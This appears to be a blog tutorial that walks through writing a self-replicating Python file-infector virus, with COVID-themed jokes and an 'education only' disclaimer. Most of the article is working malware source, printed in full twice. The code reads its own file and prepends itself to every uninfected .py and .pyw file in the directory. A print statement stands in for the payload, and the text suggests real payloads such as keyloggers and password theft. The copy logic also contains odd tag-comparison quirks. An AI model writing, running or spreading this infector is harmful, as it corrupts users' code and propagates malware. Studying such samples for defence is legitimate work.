Make a Self-Replicating Virus in Python | For Education Purposes Only

Photo by KOBU Agency on Unsplash

Namaste! *elbow bump* & *foot shake*

Hope you and your family are healthy and safe during these uncertain and unprecedented times. In this article, we’ll be learning how to make a simple computer virus in python.

This python virus, much like the SARS-CoV-2 virus, is designed to spread from host to host and has the ability to replicate itself. In more technical terms, we will be writing a program to infect all the python files present in 6ft distance (same directory) with the self-replicating code and perform malicious activities through the infected python files.

Before we get started, please wear a face mask and sanitize your hands —

DISCLAIMER : THIS TUTORIAL IS FOR EDUCATION PURPOSES ONLY AND IS NOT INTENDED TO PROMOTE ANY ILLEGAL ACTIVITIES. THE AUTHOR WILL NOT BE HELD RESPONSIBLE FOR ANY MISUSE OF THE INFORMATION PROVIDED.

TUTORIAL

The complete virus program will essentially have three parts -

1. To make a copy of the entire virus program itself.
2. To get other python files and infect them with the replicating code.
3. To deploy the payload or malware/spyware code.

To mark the start and end of the virus program we need to put tags in the first and the last line of the code.

# VIRUS SAYS HI!
{ virus code }
# VIRUS SAYS BYE!

Next, we import all the required python libraries.

import sys
import glob

Part 1: We will write the self-replicating code here by creating an empty array and getting the current file name dynamically to open and read it.

virus_code = []

with open(sys.argv[0], 'r') as f:
    lines = f.readlines()

Now, we will define a bool variable to help us know the area of the program to be copied i.e. between the start and end tags. Then, we’ll iterate over all the lines and copy them to the pre-initialized array until we reach the end.

self_replicating_part = False
for line in lines:
    if line == "# VIRUS SAYS HI!":
        self_replicating_part = True
    if not self_replicating_part:
        virus_code.append(line)
    if line == "# VIRUS SAYS BYE!\n":
        break

Part 2: To find all the python files in the current directory we will use the glob module and match pathnames by the required pattern. We’ll then save these files and read them one by one to infect with our virus code.

Here we’ll first check whether the file is already infected or not i.e. see if the file already contains the start tag. If it does we move on to the next file, if it doesn’t we infect it by adding our self-replicating virus code to the existing file code so as to preserve the original functionality.

python_files = glob.glob('*.py') + glob.glob('*.pyw')

for file in python_files:
    with open(file, 'r') as f:
        file_code = f.readlines()

    infected = False

    for line in file_code:
        if line == "# VIRUS SAYS HI!\n":
            infected = True
            break

    if not infected:
        final_code = []
        final_code.extend(virus_code)
        final_code.extend('\n')
        final_code.extend(file_code)

        with open(file, 'w') as f:
            f.writelines(final_code)

Part 3: Finally, we need to add our malicious piece of code or payload to the program to act as malware which can damage the system, corrupt the data, download other viruses, steal passwords (Run a Keylogger) or maybe take over the entire machine.

For now, we’ll just add a harmless print statement *evil laughter*

def malicious_code():
    print("YOU HAVE BEEN INFECTED HAHAHA !!!")

malicious_code()

And we are done! This is how the complete program will look when put together —

# VIRUS SAYS HI!

import sys
import glob

virus_code = []

with open(sys.argv[0], 'r') as f:
    lines = f.readlines()

self_replicating_part = False
for line in lines:
    if line == "# VIRUS SAYS HI!":
        self_replicating_part = True
    if not self_replicating_part:
        virus_code.append(line)
    if line == "# VIRUS SAYS BYE!\n":
        break

python_files = glob.glob('*.py') + glob.glob('*.pyw')

for file in python_files:
    with open(file, 'r') as f:
        file_code = f.readlines()

    infected = False

    for line in file_code:
        if line == "# VIRUS SAYS HI!\n":
            infected = True
            break

    if not infected:
        final_code = []
        final_code.extend(virus_code)
        final_code.extend('\n')
        final_code.extend(file_code)

        with open(file, 'w') as f:
            f.writelines(final_code)

def malicious_code():
    print("YOU HAVE BEEN INFECTED HAHAHA !!!")

malicious_code()

# VIRUS SAYS BYE!

Create some test files in the same directory and with caution try executing your very own self-replicating virus!

CONCLUSION

Is it practical to write a virus in a high-level programming language that performs a lot of abstraction? Is it practical to write a virus in an interpreted language like python in which the code isn’t hidden and anyone who runs it can look into the code easily? Well, when was writing a virus a practical thing to do…

If you enjoyed this post and got to learn something new do let me know by hitting the clap button :)

Thank you, take care and don’t try this at home!

Support me https://www.buymeacoffee.com/djrobin17

REFERENCES

P.S. A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE! https://weekly.infosecwriteups.com/